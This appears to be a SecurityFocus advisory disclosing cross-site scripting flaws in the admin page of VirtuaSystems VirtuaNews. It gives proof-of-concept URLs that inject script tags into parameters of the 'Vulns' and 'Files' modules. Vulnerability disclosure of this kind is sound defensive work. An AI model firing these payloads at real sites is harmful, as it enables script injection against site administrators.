VirtuaSystems VirtuaNews Multiple Module Cross-Site Scripting Vulnerabilities

No exploit is required to leverage this issue. The following proof of concepts have been provided:

Affecting the 'Vulns' module:
http://www.example.com/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>
http://www.example.com/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea>--><script>alert('XSS')</script>
http://www.example.com/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"></textarea><script>alert('XSS')</script>

Affecting the 'Files' module:
http://www.example.com/admin.php?action=files&expand="><script>alert('XSS')</script>
http://www.example.com/admin.php?action=files_cat_delete&id="><script>alert('XSS')</script>
http://www.example.com/admin.php?action=files_check&catid="><script>alert('XSS')</script>
http://www.example.com/admin.php?action=newslogo_upload&"><script>alert('XSS')</script>


 

Privacy Statement
Copyright 2010, SecurityFocus